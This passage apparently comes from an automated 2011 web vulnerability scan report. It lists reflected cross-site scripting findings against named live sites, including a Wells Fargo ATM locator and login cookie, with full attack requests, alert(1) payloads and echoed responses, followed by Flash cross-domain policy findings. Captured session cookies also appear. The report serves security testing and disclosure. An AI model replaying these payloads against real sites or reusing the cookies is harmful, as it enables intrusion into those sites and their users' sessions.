<link rel="canonical" href="http://www.codero.com/images106c4"><script>alert(1)</script>1ca562d2af6/design/banner_certified-expertise.png" />
...[SNIP]...

2.17. http://www.codero.com/images/design/banner_i7-promo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_i7-promo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46256"><script>alert(1)</script>9e0d96ee923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images46256"><script>alert(1)</script>9e0d96ee923/design/banner_i7-promo.png?time=1308602405 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:31 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 31995
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images46256"><script>alert(1)</script>9e0d96ee923/design/banner_i7-promo.png" />
...[SNIP]...

2.18. http://www.codero.com/images/design/menu_i7-promo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/menu_i7-promo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31e5"><script>alert(1)</script>204885c9e13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagese31e5"><script>alert(1)</script>204885c9e13/design/menu_i7-promo.png?time=1308602405 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:23 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32035
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/imagese31e5"><script>alert(1)</script>204885c9e13/design/menu_i7-promo.png" />
...[SNIP]...

2.19. http://www.codero.com/images/design/rc_i7-promo.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/rc_i7-promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9b7"><script>alert(1)</script>82f9782ebb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7b9b7"><script>alert(1)</script>82f9782ebb1/design/rc_i7-promo.jpg?time=1308602405 HTTP/1.1
Host: www.codero.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.codero.com/images106c4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E1ca562d2af6/design/banner_certified-expertise.png?time=1308058010

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:06:00 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32032
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images7b9b7"><script>alert(1)</script>82f9782ebb1/design/rc_i7-promo.jpg" />
...[SNIP]...

2.20. http://www.printfection.com/torprojectstore [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc9"-alert(1)-"2effdd3df20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore?d2bc9"-alert(1)-"2effdd3df20=1 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 01:59:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
Tracker = _gat._getTracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore?d2bc9"-alert(1)-"2effdd3df20=1");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.21. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1298"-alert(1)-"886ff40fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore/T-Shirt/_p_4740139a1298"-alert(1)-"886ff40fc2f HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29551
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
tTracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore/T-Shirt/_p_4740139a1298"-alert(1)-"886ff40fc2f");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.22. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8069"-alert(1)-"9cdd008e860 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore/T-Shirt/_p_4740139?a8069"-alert(1)-"9cdd008e860=1 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 178385

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
Tracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore/T-Shirt/_p_4740139?a8069"-alert(1)-"9cdd008e860=1");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.23. https://www.wellsfargo.com/locator/atm/search [txtCity parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The value of the txtCity request parameter is copied into the HTML document as text between TITLE tags. The payload cdf27</title><a>c2100b7621f was submitted in the txtCity parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /locator/atm/search?txtCity=cdf27</title><a>c2100b7621f&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:52:01 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<title>Banks and ATMs in Cdf27</title><a>c2100b7621f 10010 - Wells Fargo Banking Locations</title>
...[SNIP]...

2.24. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The value of the wfacookie cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbdc"><script>alert(1)</script>e346e472bc6 was submitted in the wfacookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411acbdc"><script>alert(1)</script>e346e472bc6; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:48:04 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<img
                                       src="https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5?COL01STO=1&Unique_ID=B-20110719024057407636411acbdc"><script>alert(1)</script>e346e472bc6"
                                       border="0" height="1" width="1" alt="">
...[SNIP]...

2.25. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The value of the wfacookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8eb'-alert(1)-'cf811bce440 was submitted in the wfacookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411ae8eb'-alert(1)-'cf811bce440; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:48:07 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<!--
                                       ROItag('994-1668-2054-5', 'COL01STO=1', 'Unique_ID=B-20110719024057407636411ae8eb'-alert(1)-'cf811bce440')
                                       -->
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 28 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. https://adfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 19 Jul 2011 10:03:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.3. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.4. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.5. http://c.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
